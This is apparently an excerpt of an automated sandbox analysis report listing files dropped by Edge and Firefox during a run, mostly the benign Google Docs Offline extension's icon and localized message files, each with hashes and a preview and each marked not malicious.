Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7...Kk?....]<.S(.....9}........$..6...:...9..b\|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..\|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]....-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

C:\Users\user\AppData\Local\Temp\5e9ec720-0274-4dd8-a889-81855dd3bfb9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.38933713767344
Encrypted:	false
SSDEEP:	24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0PU1v5eUzu0PUy615M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ51
MD5:	4FE251EA0499BAEF28F5D43D8615F21F
SHA1:	8A5BABEA266691ADFE60FA036832912D9B5DD518
SHA-256:	D3D3D22CCBA1FC11C20F70CA48F659117D68364FF04FEDD48CB6CA8E68F70228
SHA-512:	A1B331F94DF086E12C095899268BAE5A21E9850A824E142FAFE1B03E2D2C8661B6E245DDB7ADFD3FE2114EA0483BEAB61B5C3E0DCC346CA10A92FAD637E1B0A2
Malicious:	false
Preview:	{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

C:\Users\user\AppData\Local\Temp\e695017e-b423-4ff9-a105-5f7a5f00d567.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\2858f2e5-7550-41a7-ba31-ddd9f50c298c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135751
Entropy (8bit):	7.804610863392373
Encrypted:	false
SSDEEP:	1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
MD5:	83EF25FBEE6866A64F09323BFE1536E0
SHA1:	24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
SHA-256:	F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
SHA-512:	C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7...Kk?....]<.S(.....9}........$..6...:...9..b\|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..\|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]....-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
